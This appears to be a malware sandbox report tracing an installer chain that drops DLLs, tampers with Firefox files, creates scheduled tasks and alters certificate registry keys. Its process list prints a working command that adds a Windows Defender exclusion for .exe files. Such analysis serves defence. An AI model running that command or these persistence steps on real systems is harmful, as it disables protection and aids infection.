File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\KKCpynK.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\XylehJQ.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\YxYyEsY.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\SvbbHukzU\kbwbtR.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\HvGgydgoxkjNzSQ.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bLgAHCKDimrPMlxXg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000} C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4244 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe
PID 4244 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe
PID 4244 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe
PID 4200 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe
PID 4200 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe
PID 4200 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe
PID 2328 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1508 wrote to memory of 5116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1508 wrote to memory of 5116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1508 wrote to memory of 5116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1812 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1812 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1812 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 316 wrote to memory of 3716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 316 wrote to memory of 3716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 2328 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3180 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3180 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3180 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 1756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1852 wrote to memory of 1756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1852 wrote to memory of 1756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1756 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1756 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2292 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2292 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2292 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 3212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 3212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 3212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 4932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 4932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

